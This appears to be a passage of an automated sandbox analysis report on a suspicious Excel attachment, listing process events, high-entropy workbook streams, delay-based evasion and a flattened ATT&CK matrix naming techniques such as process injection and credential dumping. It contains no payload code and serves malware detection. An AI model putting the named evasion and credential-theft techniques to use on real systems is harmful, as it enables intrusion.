Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: Nouvelle_commande9353834.xlsStream path 'MBD003FE745/MBD001688DC/Package' entropy: 7.96606885719 (max. 8.0)
Source: Nouvelle_commande9353834.xlsStream path 'Workbook' entropy: 7.99818413414 (max. 8.0)
Source: EF740000.0.drStream path 'MBD003FE745/MBD001688DC/Package' entropy: 7.96606885719 (max. 8.0)
Source: EF740000.0.drStream path 'Workbook' entropy: 7.95871932129 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 835Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts13
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.